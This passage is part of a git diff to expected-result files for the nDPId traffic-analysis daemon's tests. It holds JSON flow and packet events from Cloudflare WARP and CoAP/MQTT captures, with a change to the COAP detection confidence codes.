+00653{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":63,"source":"cloudflare-warp.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1656230934714,"flow_last_seen":1656230934714,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1656230939819,"l3_proto":"ip4","src_ip":"10.158.134.93","dst_ip":"216.58.196.68","src_port":40454,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"2":"Match by IP"},"proto":"TLS.Google","breed":"Acceptable","category":"Web"}} +00585{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":63,"source":"cloudflare-warp.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1656230934714,"flow_last_seen":1656230934714,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1656230939819,"l3_proto":"ip4","src_ip":"10.158.134.93","dst_ip":"216.58.196.68","src_port":40454,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00654{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":63,"source":"cloudflare-warp.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1656230932729,"flow_last_seen":1656230932729,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1656230939819,"l3_proto":"ip4","src_ip":"10.158.134.93","dst_ip":"142.251.42.106","src_port":55512,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"2":"Match by IP"},"proto":"TLS.Google","breed":"Acceptable","category":"Web"}} +00586{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":63,"source":"cloudflare-warp.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1656230932729,"flow_last_seen":1656230932729,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1656230939819,"l3_proto":"ip4","src_ip":"10.158.134.93","dst_ip":"142.251.42.106","src_port":55512,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00683{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":63,"source":"cloudflare-warp.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"finished","flow_packets_processed":11,"flow_first_seen":1656230932996,"flow_last_seen":1656230933366,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":154,"flow_tot_l4_payload_len":276,"flow_avg_l4_payload_len":25,"midstream":0,"thread_ts_msec":1656230939819,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"159.138.85.48","src_port":42344,"dst_port":5223,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"Jabber","breed":"Acceptable","category":"Web"}} +00588{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":63,"source":"cloudflare-warp.pcap","alias":"nDPId-test","flow_id":7,"flow_state":"info","flow_packets_processed":5,"flow_first_seen":1656230939763,"flow_last_seen":1656230939766,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":202,"flow_tot_l4_payload_len":202,"flow_avg_l4_payload_len":40,"midstream":0,"thread_ts_msec":1656230939819,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"142.250.183.163","src_port":51296,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00697{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":63,"source":"cloudflare-warp.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"finished","flow_packets_processed":11,"flow_first_seen":1656230939663,"flow_last_seen":1656230939818,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":2837,"flow_tot_l4_payload_len":3417,"flow_avg_l4_payload_len":310,"midstream":0,"thread_ts_msec":1656230939819,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"104.18.47.234","src_port":45606,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.CloudflareWarp","breed":"Acceptable","category":"VPN"}} +00697{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":63,"source":"cloudflare-warp.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"finished","flow_packets_processed":11,"flow_first_seen":1656230939671,"flow_last_seen":1656230939819,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":2800,"flow_tot_l4_payload_len":3117,"flow_avg_l4_payload_len":283,"midstream":0,"thread_ts_msec":1656230939819,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"104.18.47.234","src_port":45610,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.CloudflareWarp","breed":"Acceptable","category":"VPN"}} +00827{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":63,"source":"cloudflare-warp.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"finished","flow_packets_processed":17,"flow_first_seen":1656230934073,"flow_last_seen":1656230934969,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":522,"flow_tot_l4_payload_len":1431,"flow_avg_l4_payload_len":84,"midstream":0,"thread_ts_msec":1656230939819,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"157.240.16.32","src_port":40214,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"6":"DPI"},"proto":"TLS.Messenger","breed":"Acceptable","category":"Chat"}} +00564{"daemon_event_id":3,"daemon_event_name":"shutdown","thread_id":0,"packet_id":63,"source":"cloudflare-warp.pcap","alias":"nDPId-test","packets-captured":63,"packets-processed":63,"total-skipped-flows":0,"total-l4-payload-len":8443,"total-not-detected-flows":0,"total-guessed-flows":3,"total-detected-flows":5,"total-detection-updates":3,"total-updates":0,"current-active-flows":0,"total-active-flows":8,"total-idle-flows":8,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":52,"global_ts_msec":1656230939819} +~~~~~~~~~~~~~~~~~~~~ SUMMARY ~~~~~~~~~~~~~~~~~~~~ +~~ packets captured/processed: 63/63 +~~ skipped flows.............: 0 +~~ total layer4 data length..: 8443 bytes +~~ total detected protocols..: 5 +~~ total active/idle flows...: 8/8 +~~ total timeout flows.......: 0 +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~ total memory allocated....: 6028661 bytes +~~ total memory freed........: 6028661 bytes +~~ total allocations/frees...: 120987/120987 +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~ json string min len.......: 464 chars +~~ json string max len.......: 1227 chars +~~ json string avg len.......: 844 chars diff --git a/test/results/coap_mqtt.pcap.out b/test/results/coap_mqtt.pcap.out index 387cfba8b..bdadb6bb5 100644 --- a/test/results/coap_mqtt.pcap.out +++ b/test/results/coap_mqtt.pcap.out @@ -2,92 +2,92 @@ 00549{"daemon_event_id":4,"daemon_event_name":"status","thread_id":0,"packet_id":1,"source":"coap_mqtt.pcap","alias":"nDPId-test","packets-captured":1,"packets-processed":0,"total-skipped-flows":0,"total-l4-payload-len":0,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":0,"total-detection-updates":0,"total-updates":0,"current-active-flows":0,"total-active-flows":0,"total-idle-flows":0,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":2,"global_ts_msec":1333957710293} 00612{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1,"source":"coap_mqtt.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1333957710293,"flow_last_seen":1333957710293,"flow_idle_time":200000,"flow_min_l4_payload_len":24,"flow_max_l4_payload_len":24,"flow_tot_l4_payload_len":24,"flow_avg_l4_payload_len":24,"midstream":0,"thread_ts_msec":1333957710293,"l3_proto":"ip6","src_ip":"2001:da8:215:1171:a10b:cb48:8f83:57f6","dst_ip":"2001:620:8:35d9::10","src_port":61043,"dst_port":5683,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00496{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1,"source":"coap_mqtt.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":1,"flow_last_seen":1333957710293,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":86,"pkt_l4_len":32,"thread_ts_msec":1333957710293,"pkt":"ACOJtMwBSF1gwJdKht1gAAAAACARQCABDagCFRFxoQvLSI+DV\/YgAQYgAAg12QAAAAAAAAAQ7nMWMwAg\/RpDAQXKchYzKy53ZWxsLWtub3duBGNvcmU="} -00661{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1,"source":"coap_mqtt.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1333957710293,"flow_last_seen":1333957710293,"flow_idle_time":200000,"flow_min_l4_payload_len":24,"flow_max_l4_payload_len":24,"flow_tot_l4_payload_len":24,"flow_avg_l4_payload_len":24,"midstream":0,"thread_ts_msec":1333957710293,"l3_proto":"ip6","src_ip":"2001:da8:215:1171:a10b:cb48:8f83:57f6","dst_ip":"2001:620:8:35d9::10","src_port":61043,"dst_port":5683,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"COAP","breed":"Safe","category":"RPC"}} +00661{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1,"source":"coap_mqtt.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1333957710293,"flow_last_seen":1333957710293,"flow_idle_time":200000,"flow_min_l4_payload_len":24,"flow_max_l4_payload_len":24,"flow_tot_l4_payload_len":24,"flow_avg_l4_payload_len":24,"midstream":0,"thread_ts_msec":1333957710293,"l3_proto":"ip6","src_ip":"2001:da8:215:1171:a10b:cb48:8f83:57f6","dst_ip":"2001:620:8:35d9::10","src_port":61043,"dst_port":5683,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"COAP","breed":"Safe","category":"RPC"}} 00612{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":2,"source":"coap_mqtt.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1333957715764,"flow_last_seen":1333957715764,"flow_idle_time":200000,"flow_min_l4_payload_len":24,"flow_max_l4_payload_len":24,"flow_tot_l4_payload_len":24,"flow_avg_l4_payload_len":24,"midstream":0,"thread_ts_msec":1333957715764,"l3_proto":"ip6","src_ip":"2001:da8:215:1171:a10b:cb48:8f83:57f6","dst_ip":"2001:620:8:35d9::10","src_port":61044,"dst_port":5683,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00496{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2,"source":"coap_mqtt.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":1,"flow_last_seen":1333957715764,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":86,"pkt_l4_len":32,"thread_ts_msec":1333957715764,"pkt":"ACOJtMwBSF1gwJdKht1gAAAAACARQCABDagCFRFxoQvLSI+DV\/YgAQYgAAg12QAAAAAAAAAQ7nQWMwAgAxVDAv\/NchYzKy53ZWxsLWtub3duBGNvcmU="} -00661{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":2,"source":"coap_mqtt.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1333957715764,"flow_last_seen":1333957715764,"flow_idle_time":200000,"flow_min_l4_payload_len":24,"flow_max_l4_payload_len":24,"flow_tot_l4_payload_len":24,"flow_avg_l4_payload_len":24,"midstream":0,"thread_ts_msec":1333957715764,"l3_proto":"ip6","src_ip":"2001:da8:215:1171:a10b:cb48:8f83:57f6","dst_ip":"2001:620:8:35d9::10","src_port":61044,"dst_port":5683,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"COAP","breed":"Safe","category":"RPC"}} +00661{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":2,"source":"coap_mqtt.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1333957715764,"flow_last_seen":1333957715764,"flow_idle_time":200000,"flow_min_l4_payload_len":24,"flow_max_l4_payload_len":24,"flow_tot_l4_payload_len":24,"flow_avg_l4_payload_len":24,"midstream":0,"thread_ts_msec":1333957715764,"l3_proto":"ip6","src_ip":"2001:da8:215:1171:a10b:cb48:8f83:57f6","dst_ip":"2001:620:8:35d9::10","src_port":61044,"dst_port":5683,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"COAP","breed":"Safe","category":"RPC"}} 00612{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":3,"source":"coap_mqtt.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1333957717200,"flow_last_seen":1333957717200,"flow_idle_time":200000,"flow_min_l4_payload_len":24,"flow_max_l4_payload_len":24,"flow_tot_l4_payload_len":24,"flow_avg_l4_payload_len":24,"midstream":0,"thread_ts_msec":1333957717200,"l3_proto":"ip6","src_ip":"2001:da8:215:1171:a10b:cb48:8f83:57f6","dst_ip":"2001:620:8:35d9::10","src_port":61045,"dst_port":5683,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00495{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3,"source":"coap_mqtt.pcap","alias":"nDPId-test","flow_id":3,"flow_packet_id":1,"flow_last_seen":1333957717200,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":86,"pkt_l4_len":32,"thread_ts_msec":1333957717200,"pkt":"ACOJtMwBSF1gwJdKht1gAAAAACARQCABDagCFRFxoQvLSI+DV\/YgAQYgAAg12QAAAAAAAAAQ7nUWMwAgyuNDAzf9chYzKy53ZWxsLWtub3duBGNvcmU="} -00661{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":3,"source":"coap_mqtt.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1333957717200,"flow_last_seen":1333957717200,"flow_idle_time":200000,"flow_min_l4_payload_len":24,"flow_max_l4_payload_len":24,"flow_tot_l4_payload_len":24,"flow_avg_l4_payload_len":24,"midstream":0,"thread_ts_msec":1333957717200,"l3_proto":"ip6","src_ip":"2001:da8:215:1171:a10b:cb48:8f83:57f6","dst_ip":"2001:620:8:35d9::10","src_port":61045,"dst_port":5683,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"COAP","breed":"Safe","category":"RPC"}} +00661{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":3,"source":"coap_mqtt.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1333957717200,"flow_last_seen":1333957717200,"flow_idle_time":200000,"flow_min_l4_payload_len":24,"flow_max_l4_payload_len":24,"flow_tot_l4_payload_len":24,"flow_avg_l4_payload_len":24,"midstream":0,"thread_ts_msec":1333957717200,"l3_proto":"ip6","src_ip":"2001:da8:215:1171:a10b:cb48:8f83:57f6","dst_ip":"2001:620:8:35d9::10","src_port":61045,"dst_port":5683,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"COAP","breed":"Safe","category":"RPC"}} 00612{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":4,"source":"coap_mqtt.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1333957718629,"flow_last_seen":1333957718629,"flow_idle_time":200000,"flow_min_l4_payload_len":24,"flow_max_l4_payload_len":24,"flow_tot_l4_payload_len":24,"flow_avg_l4_payload_len":24,"midstream":0,"thread_ts_msec":1333957718629,"l3_proto":"ip6","src_ip":"2001:da8:215:1171:a10b:cb48:8f83:57f6","dst_ip":"2001:620:8:35d9::10","src_port":61046,"dst_port":5683,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00495{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":4,"source":"coap_mqtt.pcap","alias":"nDPId-test","flow_id":4,"flow_packet_id":1,"flow_last_seen":1333957718629,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":86,"pkt_l4_len":32,"thread_ts_msec":1333957718629,"pkt":"ACOJtMwBSF1gwJdKht1gAAAAACARQCABDagCFRFxoQvLSI+DV\/YgAQYgAAg12QAAAAAAAAAQ7nYWMwAgvHpDBEZkchYzKy53ZWxsLWtub3duBGNvcmU="} -00661{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":4,"source":"coap_mqtt.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1333957718629,"flow_last_seen":1333957718629,"flow_idle_time":200000,"flow_min_l4_payload_len":24,"flow_max_l4_payload_len":24,"flow_tot_l4_payload_len":24,"flow_avg_l4_payload_len":24,"midstream":0,"thread_ts_msec":1333957718629,"l3_proto":"ip6","src_ip":"2001:da8:215:1171:a10b:cb48:8f83:57f6","dst_ip":"2001:620:8:35d9::10","src_port":61046,"dst_port":5683,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"COAP","breed":"Safe","category":"RPC"}} +00661{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":4,"source":"coap_mqtt.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1333957718629,"flow_last_seen":1333957718629,"flow_idle_time":200000,"flow_min_l4_payload_len":24,"flow_max_l4_payload_len":24,"flow_tot_l4_payload_len":24,"flow_avg_l4_payload_len":24,"midstream":0,"thread_ts_msec":1333957718629,"l3_proto":"ip6","src_ip":"2001:da8:215:1171:a10b:cb48:8f83:57f6","dst_ip":"2001:620:8:35d9::10","src_port":61046,"dst_port":5683,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"COAP","breed":"Safe","category":"RPC"}} 00612{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":5,"source":"coap_mqtt.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1333957720773,"flow_last_seen":1333957720773,"flow_idle_time":200000,"flow_min_l4_payload_len":28,"flow_max_l4_payload_len":28,"flow_tot_l4_payload_len":28,"flow_avg_l4_payload_len":28,"midstream":0,"thread_ts_msec":1333957720773,"l3_proto":"ip6","src_ip":"2001:da8:215:1171:a10b:cb48:8f83:57f6","dst_ip":"2001:620:8:35d9::10","src_port":61047,"dst_port":5683,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00499{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":5,"source":"coap_mqtt.pcap","alias":"nDPId-test","flow_id":5,"flow_packet_id":1,"flow_last_seen":1333957720773,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":90,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":90,"pkt_l4_len":36,"thread_ts_msec":1333957720773,"pkt":"ACOJtMwBSF1gwJdKht1gAAAAACQRQCABDagCFRFxoQvLSI+DV\/YgAQYgAAg12QAAAAAAAAAQ7ncWMwAkKH5FAYp0chYzKy53ZWxsLWtub3duBGNvcmUQEj3U"} -00661{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":5,"source":"coap_mqtt.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1333957720773,"flow_last_seen":1333957720773,"flow_idle_time":200000,"flow_min_l4_payload_len":28,"flow_max_l4_payload_len":28,"flow_tot_l4_payload_len":28,"flow_avg_l4_payload_len":28,"midstream":0,"thread_ts_msec":1333957720773,"l3_proto":"ip6","src_ip":"2001:da8:215:1171:a10b:cb48:8f83:57f6","dst_ip":"2001:620:8:35d9::10","src_port":61047,"dst_port":5683,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"COAP","breed":"Safe","category":"RPC"}} +00661{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":5,"source":"coap_mqtt.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1333957720773,"flow_last_seen":1333957720773,"flow_idle_time":200000,"flow_min_l4_payload_len":28,"flow_max_l4_payload_len":28,"flow_tot_l4_payload_len":28,"flow_avg_l4_payload_len":28,"midstream":0,"thread_ts_msec":1333957720773,"l3_proto":"ip6","src_ip":"2001:da8:215:1171:a10b:cb48:8f83:57f6","dst_ip":"2001:620:8:35d9::10","src_port":61047,"dst_port":5683,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"COAP","breed":"Safe","category":"RPC"}} 00552{"daemon_event_id":4,"daemon_event_name":"status","thread_id":0,"packet_id":6,"source":"coap_mqtt.pcap","alias":"nDPId-test","packets-captured":6,"packets-processed":5,"total-skipped-flows":0,"total-l4-payload-len":124,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":5,"total-detection-updates":0,"total-updates":0,"current-active-flows":5,"total-active-flows":5,"total-idle-flows":0,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":18,"global_ts_msec":1375090528017} 00570{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":6,"source":"coap_mqtt.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1375090528017,"flow_last_seen":1375090528017,"flow_idle_time":200000,"flow_min_l4_payload_len":19,"flow_max_l4_payload_len":19,"flow_tot_l4_payload_len":19,"flow_avg_l4_payload_len":19,"midstream":0,"thread_ts_msec":1375090528017,"l3_proto":"ip6","src_ip":"bbbb::1","dst_ip":"bbbb::3","src_port":33499,"dst_port":5683,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":6,"source":"coap_mqtt.pcap","alias":"nDPId-test","flow_id":6,"flow_packet_id":1,"flow_last_seen":1375090528017,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":81,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":81,"pkt_l4_len":27,"thread_ts_msec":1375090528017,"pkt":"uCfrprIvACTop0mhht1gAAAAABsRQLu7AAAAAAAAAAAAAAAAAAG7uwAAAAAAAAAAAAAAAAADgtsWMwAblIJCAekbB5C4c2VwYXJhdGUQ0SMR"} -00619{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":6,"source":"coap_mqtt.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1375090528017,"flow_last_seen":1375090528017,"flow_idle_time":200000,"flow_min_l4_payload_len":19,"flow_max_l4_payload_len":19,"flow_tot_l4_payload_len":19,"flow_avg_l4_payload_len":19,"midstream":0,"thread_ts_msec":1375090528017,"l3_proto":"ip6","src_ip":"bbbb::1","dst_ip":"bbbb::3","src_port":33499,"dst_port":5683,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"COAP","breed":"Safe","category":"RPC"}} +00619{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":6,"source":"coap_mqtt.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1375090528017,"flow_last_seen":1375090528017,"flow_idle_time":200000,"flow_min_l4_payload_len":19,"flow_max_l4_payload_len":19,"flow_tot_l4_payload_len":19,"flow_avg_l4_payload_len":19,"midstream":0,"thread_ts_msec":1375090528017,"l3_proto":"ip6","src_ip":"bbbb::1","dst_ip":"bbbb::3","src_port":33499,"dst_port":5683,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"COAP","breed":"Safe","category":"RPC"}} 00466{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":7,"source":"coap_mqtt.pcap","alias":"nDPId-test","flow_id":6,"flow_packet_id":2,"flow_last_seen":1375090528127,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":66,"pkt_l4_len":12,"thread_ts_msec":1375090528127,"pkt":"ACTop0mhuCfrprIvht1gAAAAAAwRQLu7AAAAAAAAAAAAAAAAAAO7uwAAAAAAAAAAAAAAAAABFjOC2wAMpjBgAOkb"} 00638{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":8,"source":"coap_mqtt.pcap","alias":"nDPId-test","flow_id":6,"flow_packet_id":3,"flow_last_seen":1375090529153,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":191,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":191,"pkt_l4_len":137,"thread_ts_msec":1375090529153,"pkt":"ACTop0mhuCfrprIvht1gAAAAAIkRQLu7AAAAAAAAAAAAAAAAAAO7uwAAAAAAAAAAAAAAAAABFjOC2wCJMIhCRVcPB5D\/VGhpcyBtZXNzYWdlIHdhcyBzZW50IGJ5IGEgc2VwYXJhdGUgcmVzcG9uc2UuCllvdXIgY2xpZW50IHdpbGwgbmVlZCB0byBhY2tub3dsZWRnZSBpdCwgb3RoZXJ3aXNlIGl0IHdpbGwgYmUgcmV0cmFuc21pdHRlZC4="} -00701{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":10,"source":"coap_mqtt.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1333957710293,"flow_last_seen":1333957710293,"flow_idle_time":200000,"flow_min_l4_payload_len":24,"flow_max_l4_payload_len":24,"flow_tot_l4_payload_len":24,"flow_avg_l4_payload_len":24,"midstream":0,"thread_ts_msec":1375090529165,"l3_proto":"ip6","src_ip":"2001:da8:215:1171:a10b:cb48:8f83:57f6","dst_ip":"2001:620:8:35d9::10","src_port":61043,"dst_port":5683,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"COAP","breed":"Safe","category":"RPC"}} -00701{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":10,"source":"coap_mqtt.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1333957715764,"flow_last_seen":1333957715764,"flow_idle_time":200000,"flow_min_l4_payload_len":24,"flow_max_l4_payload_len":24,"flow_tot_l4_payload_len":24,"flow_avg_l4_payload_len":24,"midstream":0,"thread_ts_msec":1375090529165,"l3_proto":"ip6","src_ip":"2001:da8:215:1171:a10b:cb48:8f83:57f6","dst_ip":"2001:620:8:35d9::10","src_port":61044,"dst_port":5683,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"COAP","breed":"Safe","category":"RPC"}} -00701{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":10,"source":"coap_mqtt.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1333957717200,"flow_last_seen":1333957717200,"flow_idle_time":200000,"flow_min_l4_payload_len":24,"flow_max_l4_payload_len":24,"flow_tot_l4_payload_len":24,"flow_avg_l4_payload_len":24,"midstream":0,"thread_ts_msec":1375090529165,"l3_proto":"ip6","src_ip":"2001:da8:215:1171:a10b:cb48:8f83:57f6","dst_ip":"2001:620:8:35d9::10","src_port":61045,"dst_port":5683,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"COAP","breed":"Safe","category":"RPC"}} 